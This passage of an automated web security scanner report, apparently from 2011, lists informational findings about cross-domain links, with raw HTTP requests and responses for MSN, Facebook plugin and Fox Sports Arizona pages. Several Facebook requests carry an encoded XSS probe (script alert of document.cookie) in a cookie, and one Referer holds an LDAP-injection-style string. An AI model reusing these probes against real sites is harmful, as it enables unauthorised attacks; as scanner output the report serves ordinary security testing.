<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div id="makehome">
           <a href="http://www.myhomeredacted/" id="hplink">Make redacted your home page</a>
...[SNIP]...
<span class=" last"><a href="http://www.pingg.com/account/products/create_invite?customize=delish&design_category_to_open=delish&partner=delish">Invitations & eCards</a>
...[SNIP]...
<p>For the last several days<a href="http://www.boingboing.net/2011/01/24/frozen-pizza-and-fro.html" target="_blank"> rumors have been circling</a> the
Internet that <a href="http://www.digiorno.com/" target="_blank">DiGiorno </a>
...[SNIP]...
<p>But a check of the pizza purveyor's <a href="http://www.facebook.com/digiorno#!/digiorno?v=wall" target="_blank">Facebook page</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/home/home">Advertise Online</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank">MSN Privacy Policy</a>
...[SNIP]...
<li><a href="http://g.redacted/0TO_/enus" target="_blank">Legal</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/home/home.asp">Advertise</a>
...[SNIP]...
<li class="last"><a href="http://privacy.microsoft.com/en-us/fullnotice.mspx#EBG">About our ads</a>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://analytics.live.com/Analytics/wlAnalytics.js"></script>
...[SNIP]...
<noscript><img src="http://hearstmagazines.112.2o7.net/b/ss/hmagglobal/1/H.22.1--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...

22.417. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dooce.com
Path:   /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/?\w+|mtv.com/$|mtv.com/ontv/\?\w+|mtv.com/ontv/$|http://www.pcmag.com/&|http://www.pcmag.com/reviews|http://www.pcmag.com/category2/0,2806,24,00.asp|http://www.pcmag.com/category2/0,2806,9,00.asp|http://www.pcmag.com/category2/0,2806,4829,00.asp|http://www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http://www.terra.com.mx/default.htm|http://www.terra.com/$|www.people.com/$|http://www.walmart.com/|http://www.walmart.com/cp/toys/4171|http://www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.dooce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:52:34 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: SESS30952fbaf4ac11922b9cafbdf8d115e4=63030eb63e5bd76c6ee5ed01bf8dd4c8; expires=Tue, 22-Feb-2011 05:25:54 GMT; path=/; domain=.dooce.com
Last-Modified: Sun, 30 Jan 2011 01:51:22 GMT
ETag: "3667780cc336028c46b22ca6d19246cc"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"xmlns=xmlns:og="http://opengraphprot
...[SNIP]...
<!-- FM STAMP Pushdown 970x66 Zone -->
<script type='text/javascript' src='http://static.fmpub.net/zone/2555'></script>
...[SNIP]...
<!-- FM Leaderboard Zone -->
<script type='text/javascript' src='http://static.fmpub.net/zone/936'></script>
...[SNIP]...
<p><a href="http://www.amazon.com/gp/product/1416936017?ie=UTF8&tag=dooce-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=1416936017">Amazon</a><img src="http://www.assoc-amazon.com/e/ir?t=dooce-20&l=as2&o=1&a=1416936017" width="1" height="1" border="0" alt="" style="border:none !important; margin:0px !important;" />
</p>
<p><a href="http://search.barnesandnoble.com/It-Sucked-and-Then-I-Cried/Heather-Armstrong/e/9781416936015/?itm=1&afsrc=1&lkid=J27409269&pubid=K193348&byo=1">Barnes & Noble</a>
...[SNIP]...
<p><a href="http://books.simonandschuster.com/buy/It-Sucked-and-Then-I-Cried/9781416936015/from-other-retailers#book_retailers">Other Vendors</a>
...[SNIP]...
<p><a href="http://www.amazon.com/gp/product/0758216599?ie=UTF8&tag=dooce-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=0758216599">Amazon</a><img src="http://www.assoc-amazon.com/e/ir?t=dooce-20&l=as2&o=1&a=0758216599" width="1" height="1" border="0" alt="" style="border:none !important; margin:0px !important;" />
</p>
<p><a href="http://search.barnesandnoble.com/Things-I-Learned-about-My-Dad/Heather-B-Armstrong/e/9780758216595/?itm=1&afsrc=1&lkid=J27409285&pubid=K193348&byo=1">Barnes & Noble</a>
...[SNIP]...
<li><a href="http://flickr.com/photos/dooce/">flickr</a></li>
<li><a href="http://twitter.com/dooce">Twitter</a>
...[SNIP]...
<p>.. 2001 - 2011 Armstrong Media, LLC. All rights reserved. Powered by <a href="http://drupal.org">Drupal</a>. Hosted by <a href="http://www.liquidweb.com/?RID=dooce">Liquidweb</a>
...[SNIP]...
<img src="/sites/all/themes/dooce/images/footer-fm_small.gif" width="17" height="12" alt="Footer FM badge" style="margin-left:15px;margin-top:3px;" border="0"> FM Living <a href="http://advertisers.federatedmedia.net/plan.php?site=dooce">Advertise on dooce..</a>
...[SNIP]...

22.418. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FTechnolog%2F108546889203630 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 01:52:45 GMT
Content-Length: 8272

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yy/r/XJ7kiAXTdg6.css" />

<script type="text/javascript" src="http://e.static.ak.fbcdn.net/rsrc.php/yM/r/6hIcCnDV7Kr.js"></script>
...[SNIP]...

22.419. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/pages/Technolog/108546889203630 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://technolog.msnbc.redacted/_news/2011/01/28/*)(sn=*/?GT1=43001
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Sun, 30 Jan 2011 01:19:41 GMT
Content-Length: 7961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yc/r/JJt3yB2LDLj.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yM/r/6hIcCnDV7Kr.js"></script>
...[SNIP]...

22.420. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Ftodayshow%3Fref%3Dts&width=230&connections=0&stream=false&header=false&height=70 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 01:52:41 GMT
Content-Length: 9315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://e.static.ak.fbcdn.net/rsrc.php/yo/r/wqv1o-EUF6N.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yT/r/9lPyO_dICNw.css" />

<script type="text/javascript" src="http://e.static.ak.fbcdn.net/rsrc.php/yM/r/6hIcCnDV7Kr.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/todayshow" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs174.ash2/41796_12566691349_5235509_q.jpg" alt="Today Show" /></a>
...[SNIP]...

22.421. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2FLifeIncBlog&width=220&colorscheme=light&connections=00&stream=false&header=false&height=60 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 01:52:43 GMT
Content-Length: 6143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://e.static.ak.fbcdn.net/rsrc.php/yo/r/wqv1o-EUF6N.css" />
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/y4/r/dEWxw0CYkCs.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yT/r/9lPyO_dICNw.css" />

<script type="text/javascript" src="http://e.static.ak.fbcdn.net/rsrc.php/yM/r/6hIcCnDV7Kr.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico" /></head>
...[SNIP]...

22.422. http://www.facebook.com/sharer.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /sharer.php?u={0}&t={1}%3a+{2} HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=CnwRb; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php%3Fu%3D%257B0%257D%26t%3D%257B1%257D%253A%2B%257B2%257D; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php%3Fu%3D%257B0%257D%26t%3D%257B1%257D%253A%2B%257B2%257D; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 01:53:01 GMT
Content-Length: 10749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yT/r/9lPyO_dICNw.css" />
<link type="text/css" rel="stylesheet" href="http://d.static.ak.fbcdn.net/rsrc.php/yS/r/dXr3z4t4Z9u.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/ye/r/ZveyUJsCpv8.css" />
<link type="text/css" rel="stylesheet" href="http://e.static.ak.fbcdn.net/rsrc.php/yR/r/3ltOPQgcfkx.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/ya/r/035cJZ3XnJP.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://e.static.ak.fbcdn.net/rsrc.php/yM/r/6hIcCnDV7Kr.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico" /></head>
...[SNIP]...

22.423. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsarizona.com
Path:   /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825&feedID=3698&gt1=39002 HTTP/1.1
Host: www.foxsportsarizona.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 30 Jan 2011 17:10:29 GMT
Date: Sun, 30 Jan 2011 17:10:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 62088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<span class="msnlogo_top"><a href="http://www.redacted"><img id="msnlogo" src="http://blstc.redacted/br/gbl/css/10/decoration/logo_sm_msn_rev24.png" title="go to redacted" alt="go to redacted" /></a>
...[SNIP]...
<li class="c1"><a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.redacted/">Celebrities</a>
...[SNIP]...
<li class="new"><a href="http://thebubble.redacted/ "><strong>
...[SNIP]...
<li><a href="http://entertainment.redacted/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home">Games</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com/">Music</a></li><li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a></li><li><a href="http://tv.redacted/"> TV</a></li><li><a href="http://entertainment.redacted/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c2"><a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/investor/home.aspx">Investing</a></li><li><a href="http://moneycentral.redacted/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li><li><a href="http://realestate.redacted/">Real Estate &amp; Rentals</a>
...[SNIP]...
<li><a href="http://articles.redacted/video/default.aspx?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c3"><a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.redacted/your-look/">Beauty &amp; Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a></li><li><a href="http://lifestyle.redacted/your-home/">Decor &amp; Organizing</a>
...[SNIP]...
<li><a href="http://glo.redacted/">Glo</a></li><li><a href="http://health.msn.com/">Health, Diet &amp; Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&amp;Af=-1000&amp;VS">Horoscopes</a></li><li><a href="http://lifestyle.redacted/relationships/">Love &amp; Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670269"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a></li><li><a href="http://lifestyle.redacted/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c4 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a></li><li><a href="http://careers.msn.com/">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://my.redacted/">My MSN</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268"><strong>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home">Games</a></li><li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li><li><a href="http://wonderwall.redacted/">Wonderwall</a></li><li><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li><li><a href="http://realestate.redacted/">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://yellowpages.redacted/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://latino.msn.com/">Latino</a></li><li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a></li><li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=FOXSP">Bing</a></span><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div class="selected"><a id="sslink" href="http://msn.foxsports.com/search">Search FS Arizona</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the Web</a>
...[SNIP]...
<a href='/pages/main' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7552.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://www.foxsportscarolinas.com' target = '_blank' >FS Carolinas</a>
<a href='http://www.foxsportsdetroit.com' target = '_blank' >FS Detroit</a>
<a href='http://www.foxsportsflorida.com' target = '_blank' >FS Florida</a>
<a href='http://www.foxsportshouston.com' target = '_blank' >FS Houston</a>
<a href='http://www.foxsportskansascity.com' target = '_blank' >FS Kansas City</a>
<a href='http://www.foxsportsmidwest.com' target = '_blank' >FS Midwest</a>
<a href='http://www.foxsportsnorth.com' target = '_blank' >FS North</a>
<a href='http://www.foxsportsohio.com' target = '_blank' >FS Ohio</a>
<a href='http://www.foxsportssouth.com' target = '_blank' >FS South</a>
<a href='http://www.foxsportssouthwest.com' target = '_blank' >FS Southwest</a>
<a href='http://www.foxsportstennessee.com' target = '_blank' >FS Tennessee</a>
<a href='http://www.foxsportswest.com' target = '_blank' >FS West</a>
<a href='http://www.foxsportswisconsin.com' target = '_blank' >FS Wisconsin</a>
<a href='http://www.nesn.com' target = '_blank' >NESN Boston</a>
...[SNIP]...
<a href='/pages/dbacks' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7689.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=schedule' target = '_blank' >Schedule</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=roster' target = '_blank' >Roster</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=stats' target = '_blank' >Statistics</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=profiles' target = '_blank' >Team stats</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=injuries' target = '_blank' >Injury report</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=trans' target = '_blank' >Transactions</a>
<a href='http://foxsportsarizona.stats.com/mlb/scoreboard.asp' target = '_blank' >Scoreboard</a>
<a href='http://foxsportsarizona.stats.com/mlb/standings.asp' target = '_blank' >Standings</a>
<a href='http://foxsportsarizona.stats.com/mlb/index.asp' target = '_blank' >MLB leaders</a>
...[SNIP]...
<a href='/pages/suns' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7688.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&type=schedule' target = '_blank' >Schedule</a>
<a href='http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&btnGo=Go&type=roster' target = '_blank' >Roster</a>
<a href='http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&btnGo=Go&type=enc' target = '_blank' >Statistics</a>
<a href='http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&btnGo=Go&type=injuries' target = '_blank' >Injury report</a>
<a href='http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&btnGo=Go&type=trans' target = '_blank' >Transactions</a>
<a href='http://foxsportsarizona.stats.com/nba/scoreboard.asp' target = '_blank' >Scoreboard</a>
<a href='http://foxsportsarizona.stats.com/nba/standings.asp' target = '_blank' >Standings</a>
<a href='http://foxsportsarizona.stats.com/nba/index.asp' target = '_blank' >NBA leaders</a>
...[SNIP]...
<a href='/pages/coyotes' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7687.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/nhl/teamstats.asp?teamno=24&type=schedule' target = '_blank' >Schedule</a>
